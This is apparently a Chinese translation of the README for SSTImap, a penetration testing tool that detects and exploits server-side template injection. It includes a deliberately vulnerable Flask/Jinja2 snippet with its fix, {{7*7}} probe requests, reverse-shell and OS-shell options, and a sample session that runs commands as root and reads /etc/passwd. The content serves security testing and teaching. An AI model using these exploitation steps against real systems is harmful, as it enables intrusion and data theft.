
SSTImap v1.4
具有交互界面的自动SSTI检测工具
SSTImap
本项目基于 Tplmap。
SSTImap 是一款渗透测试软件,可以检测网站是否存在代码注入和服务端模板注入漏洞,并对其进行利用,从而获得操作系统本身的访问权限。
该工具被开发为用于 SSTI 检测和利用的交互式渗透测试工具,支持更高级的利用方式。更多 SSTImap 的 payload 可以在此处找到。
Payload 和技术来源:
- James Kettle 的 [服务端模板注入:现代 Web 应用的 RCE][5]
- 其他公开研究 [[1]][1] [[2]][2] [[8]][8]
- 对 Tplmap 的贡献 [[3]][3] [[4]][4]
- 我自己的研究 [[9]][9]
该工具能够利用某些代码上下文逃逸和盲注场景。它还支持 Java、JavaScript、PHP、Python、Ruby 以及通用非沙箱模板引擎中的 eval() 类代码注入。
与 Tplmap 的主要区别
尽管该软件基于 Tplmap 的代码,但不提供向后兼容性。
- 新增两种用于 SSTI 检测和利用的技术
- 交互模式(
-i),便于利用和检测 - 使用简单求值 payload 作为响应标记,以判断 payload 是否被反射
- 为通用模板添加了新 payload,使用
--generic测试所有上下文 - 使用
Eval_generic模块进行通用求值模板注入检测 - 基础语言 eval() 类 shell(
-x)或单条命令(-X)执行 - 盲文件上传现在支持 MD5 确认和文件存在性检查
- 为更多模板添加了新 payload,并更新了许多现有 payload
- 模块化插件结构,支持安装额外插件
- 支持不同的 POST 数据类型
- 添加了爬取和表单检测功能
- 许多参数添加了短版本
- 部分旧命令行参数已更改,请查看
-h获取帮助 - 代码已更新以使用更新的 Python 特性
- Burp Suite 扩展暂时移除,因为 Jython 不支持 Python3
服务端模板注入
以下是一个使用 Python [Flask][6] 框架和 [Jinja2][7] 模板引擎编写的简单网站示例。它以不安全的方式集成了用户提供的变量 name,因为该变量在渲染前被拼接到了模板字符串中。
from flask import Flask, request, render_template_string
import os
app = Flask(__name__)
@app.route("/page")
def page():
name = request.args.get('name', 'World')
# SSTI 漏洞:
template = f"Hello, {name}!<br>\n" \
"OS type: {{os}}"
return render_template_string(template, os=os.name)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=80)
这种模板使用方式不仅会产生 XSS 漏洞,还允许攻击者注入将在服务器上执行的模板代码,从而导致 SSTI。
$ curl -g 'https://www.target.com/page?name=John'
Hello John!<br>
OS type: posix
$ curl -g 'https://www.target.com/page?name={{7*7}}'
Hello 49!<br>
OS type: posix
用户提供的输入应通过渲染上下文以安全的方式引入:
from flask import Flask, request, render_template_string
import os
app = Flask(__name__)
@app.route("/page")
def page():
name = request.args.get('name', 'World')
template = "Hello, {{name}}!<br>\n" \
"OS type: {{os}}"
return render_template_string(template, name=name, os=os.name)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=80)
预定模式
SSTImap 的预定模式与 Tplmap 非常相似。它能够检测和利用多种不同模板中的 SSTI 漏洞。
利用成功后,SSTImap 可以提供代码求值、操作系统命令执行和文件系统操作等访问能力。
要检查 URL,可以使用 -u 参数:
$ ./sstimap.py -u https://example.com/page?name=John
╔══════╦══════╦═══════╗ ▀█▀
║ ╔════╣ ╔════╩══╗ ╔══╝═╗▀╔═
║ ╚════╣ ╚════╗ ║ ║ ║{║ _ __ ___ __ _ _ __
╚════╗ ╠════╗ ║ ║ ║ ║*║ | '_ ` _ \ / _` | '_ \
╔════╝ ╠════╝ ║ ║ ║ ║}║ | | | | | | (_| | |_) |
╚══════╩══════╝ ╚═╝ ╚╦╝ |_| |_| |_|\__,_| .__/
│ | |
|_|
[*] Version: 1.4.0
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] Testing if GET parameter 'name' is injectable
[*] Smarty plugin is testing rendering with tag '*'
...
[*] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] SSTImap identified the following injection point:
GET parameter: name
Engine: Jinja2
Injection: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:
Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code
[+] Rerun SSTImap providing one of the following options:
--os-shell Prompt for an interactive operating system shell
--os-cmd Execute an operating system command.
--eval-shell Prompt for an interactive shell on the template engine base language.
--eval-cmd Evaluate code in the template engine base language.
--tpl-shell Prompt for an interactive shell on the template engine.
--tpl-cmd Inject code in the template engine.
--bind-shell PORT Connect to a shell bind to a target port
--reverse-shell HOST PORT Send a shell back to the attacker's port
--upload LOCAL REMOTE Upload files to the server
--download REMOTE LOCAL Download remote files
使用 --os-shell 选项在目标上启动一个伪终端。
$ ./sstimap.py -u https://example.com/page?name=John --os-shell
╔══════╦══════╦═══════╗ ▀█▀
║ ╔════╣ ╔════╩══╗ ╔══╝═╗▀╔═
║ ╚════╣ ╚════╗ ║ ║ ║{║ _ __ ___ __ _ _ __
╚════╗ ╠════╗ ║ ║ ║ ║*║ | '_ ` _ \ / _` | '_ \
╔════╝ ╠════╝ ║ ║ ║ ║}║ | | | | | | (_| | |_) |
╚══════╩══════╝ ╚═╝ ╚╦╝ |_| |_| |_|\__,_| .__/
│ | |
|_|
[*] Version: 1.4.0
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] Loaded plugins by categories: languages: 6; generic: 5; java: 4; javascript: 7; php: 3; python: 5; ruby: 2
[*] Loaded request body types by categories: auto: 1; http: 1; object: 2; raw: 3
[*] Testing if GET parameter 'name' is injectable
[*] Smarty plugin is testing rendering with tag '*'
...
[*] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] SSTImap identified the following injection point:
GET parameter: name
Engine: Jinja2
Injection: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:
Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code
[+] Run commands on the operating system.
posix-linux $ whoami
root
posix-linux $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
要获取完整的选项列表,请使用 --help 参数。
交互模式
在交互模式中,使用命令与 SSTImap 进行交互。要进入交互模式,可以使用 -i 参数。除利用 payload 相关参数外,所有其他参数都将作为设置的初始值。
某些命令用于在测试运行之间更改设置。要运行测试,必须通过初始的 -u 参数或 url 命令提供目标 URL。之后,可以使用 run 命令检查 URL 是否存在 SSTI。
如果发现 SSTI,可以使用命令开始利用。你可以获得与预定模式相同的利用能力,但可以使用 Ctrl+C 中止它们而无需停止程序。
顺便说一下,测试结果在目标 URL 更改之前一直有效,因此你可以轻松地在不同的利用方法之间切换,而无需每次都重新运行检测测试。
要获取完整的交互命令列表,请在交互模式中使用 help 命令。
支持的模板引擎
SSTImap 支持多种模板引擎和 eval() 类注入。
欢迎在 PR 中提交新的 payload。查看提示以加快开发速度。